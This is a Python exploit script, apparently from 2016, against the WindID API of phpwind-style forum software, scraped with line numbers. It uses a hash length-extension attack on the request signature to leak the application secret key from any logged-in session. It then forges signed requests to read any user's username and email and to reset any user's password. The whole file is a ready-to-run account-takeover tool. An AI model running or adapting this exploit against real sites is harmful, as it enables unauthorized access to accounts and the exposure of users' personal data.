#!/usr/bin/env python# author: RickGray# update: 2016-05-25# >>>>>>>>>>># re

1. #!/usr/bin/env python
2. # author: RickGray
3. # update: 2016-05-25
4. # >>>>>>>>>>>
5. # requests, hashpumpy modules required
6. # : pip install requests hashpumpy
7.  
8. import re
9. import json
10. import time
11. import hashlib
12. import argparse
13. import operator
14.  
15. import requests
16. import hashpumpy
17.  
18.  
19. def md5(s):
20. return hashlib.md5(str(s)).hexdigest()
21.  
22.  
23. def ksort(d):
24. sorted_d = sorted(d.iteritems(), key=operator.itemgetter(0))
25. return sorted_d
26.  
27.  
28. def get_appkey(a, t, s, g, p):
29. array = ['windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token',
30. 'Filename', 'Upload', 'token', '__data']
31. ss = ''
32. get = ksort(g)
33. post = ksort(p)
34. for k, v in get:
35. if k in array:
36. continue
37. ss += (str(k) + str(v))
38. for k, v in post:
39. if k in array:
40. continue
41. ss += (str(k) + str(v))
42.  
43. return md5(md5(a + '||' + s) + t + ss)
44.  
45.  
46. def get_clientid_and_secretkey(t, c):
47. def fetch_uid(p):
48. pattern = r'%26uid%3D(?P<uid>[0-9]{1,})%26'
49. result = re.search(pattern, p)
50. return result.group('uid') if result else None
51.  
52. def fetch_windidkey(p):
53. pattern = r'%26windidkey%3D(?P<windidkey>[a-f0-9]{32})'
54. result = re.search(pattern, p)
55. return result.group('windidkey') if result else None
56.  
57. def fetch_time(p):
58. pattern = r'%26time%3D(?P<time>[0-9]+)%26'
59. result = re.search(pattern, p)
60. return result.group('time') if result else None
61.  
62. def fetch_clientid(p):
63. pattern = r'%26clientid%3D(?P<clientid>.*?)%26'
64. result = re.search(pattern, p)
65. return result.group('clientid') if result else None
66.  
67. _ = t + '/index.php?m=profile&c=avatar&_left=avatar'
68. text = requests.get(_, headers={'Cookie': c}).content
69.  
70. uid = fetch_uid(text)
71. windidkey = fetch_windidkey(text)
72. rtime = fetch_time(text)
73. clientid = fetch_clientid(text)
74.  
75. if uid and windidkey and rtime and clientid:
76. print('[*] uid = %s' % uid)
77. print('[*] windidkey = %s' % windidkey)
78. print('[*] time = %s' % rtime)
79. print('[*] clientid = %s' % clientid)
80.  
81. origin = rtime + 'adoAvatarcavatarmapitypeflashuid{}uidundefined'.format(uid)
82. # a=get&c=app&m=api&id=1 str.=key+val ksort($POST)
83. padding = 'agetcappid1mapi'
84. fakehash, fakedata = hashpumpy.hashpump(windidkey, origin, padding, 32)
85. print('[*] fakehash = %s' % fakehash)
86. print('[*] fakedata = 0x%s' % fakedata.encode('hex'))
87. __ = t + '/windid/index.php'
88. params = {
89. origin.replace(rtime, ''): re.search(r'(\x80.*\x00)', fakedata).group(1),
90. 'clientid': clientid,
91. 'time': rtime,
92. 'windidkey': fakehash,
93. }
94. data = dict(a='get', c='app', id='1', m='api')
95. response = requests.post(__,
96. params=params,
97. data=data, headers={'Cookie': c})
98. print('[*] content = %s' % response.content)
99. secret = json.loads(response.content)['secretkey']
100. return clientid, secret
101. else:
102. print('error in fetch data with content')
103. return None
104.  
105.  
106. def fetch_user_info(t, clientid, secret, uid):
107. _ = t + '/windid/index.php'
108. ctime = str(int(time.time()))
109. params = {
110. 'userid': uid,
111. 'time': ctime,
112. 'clientid': clientid
113. }
114. data = dict(a='get', c='user', m='api')
115. appkey = get_appkey(str(clientid), ctime, secret, params, data)
116. params['windidkey'] = appkey
117. response = requests.post(_, params=params, data=data)
118. infos = json.loads(response.content)
119. username = infos['username']
120. email = infos['email']
121.  
122. print('[*] uid = %s' % uid)
123. print('[^] >>>>>>>>> username = %s' % username)
124. print('[^] email = %s' % email)
125.  
126.  
127. def change_user_password(t, clientid, secret, uid, password):
128. fetch_user_info(t, clientid, secret, uid)
129.  
130. _ = t + '/windid/index.php'
131. ctime = str(int(time.time()))
132. params = {
133. 'time': ctime,
134. 'clientid': clientid
135. }
136. data = dict(uid=uid, a='editUser', c='user', m='api', password=password)
137. appkey = get_appkey(str(clientid), ctime, secret, params, data)
138. params['windidkey'] = appkey
139. response = requests.post(_, params=params, data=data)
140.  
141. return response.content
142.  
143.  
144. def parse_args():
145. parser = argparse.ArgumentParser()
146.  
147. subparsers = parser.add_subparsers(dest='mode')
148. getsecret = subparsers.add_parser('getsecret', help='get secret key value')
149. getsecret.add_argument('-c', '--cookie', dest='COOKIE', type=str,
150. help='the cookie logined with any user')
151.  
152. chpass = subparsers.add_parser('chpass',
153. help='change user password with secret key')
154. chpass.add_argument('-i', '--clientid', dest='CLIENTID', type=int,
155. help='the clientid windid used')
156. chpass.add_argument('-s', '--secretkey', dest='SECRETKEY', type=str,
157. help='the client secret key used')
158. chpass.add_argument('-u', '--uid', dest='UID', type=int,
159. help='the user uid you want to change')
160. chpass.add_argument('-p', '--password', dest='PASSWORD', type=str,
161. help='the password you want to change')
162.  
163. parser.add_argument(dest='TARGET', type=str)
164.  
165. return parser.parse_args()
166.  
167.  
168. if __name__ == '__main__':
169. args = parse_args()
170.  
171. if args.mode == 'getsecret':
172. target = args.TARGET
173. cookie = args.COOKIE
174. try:
175. cid, secretkey = get_clientid_and_secretkey(target, cookie)
176. if cid and secretkey:
177. print('')
178. print('[^] >>>>>>>>> secretkey = %s' % secretkey)
179. print('[^] clientid = %s' % cid)
180. except Exception as ex:
181. print('failed get secretkey, ("{}")'.format(str(ex)))
182. elif args.mode == 'chpass':
183. target = args.TARGET
184. cid = args.CLIENTID
185. key = args.SECRETKEY
186. u = args.UID
187. pp = args.PASSWORD
188. try:
189. res = change_user_password(target, cid, key, u, pp)
190. if res == '1':
191. print('')
192. print('[^] >>>>>>>>> succeed!')
193. print('[^] password = %s' % pp)
194. except Exception as ex:
195. print('failed change user password, ("{}")'.format(str(ex)))